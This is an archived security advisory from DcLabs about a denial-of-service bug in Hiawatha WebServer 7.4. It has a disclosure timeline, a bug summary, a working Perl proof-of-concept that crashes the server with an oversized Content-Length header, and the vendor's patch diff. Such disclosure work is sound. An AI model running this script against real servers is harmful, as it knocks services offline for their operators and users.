exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hiawatha WebServer 7.4 Denial Of Service

Hiawatha WebServer 7.4 Denial Of Service
Posted Mar 7, 2011
Authored by ipax | Site dclabs.com.br

Hiawatha WebServer version 7.4 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 80318ee6a80e3cdf8451955911b1bdd5b63a92301b713132026bb94ed35fbc6b

Hiawatha WebServer 7.4 Denial Of Service

Change Mirror Download
[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]
- Hiawatha WebServer 7.4

[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.

- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz

[Advisory Timeline]

- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Content-Length entity-header filed miscalculation.

[Impact]

- Low

[Affected Version]

- 7.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.

[PoC]

# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "OPTIONS * HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length: 2147483599\r\n\r\n";
        sleep(3);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

-- hiawatha.c --

-- BEGIN --
20a21
> #include <limits.h>
421c422
<                                                       if
(content_length < 0) {
---
>                                       if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close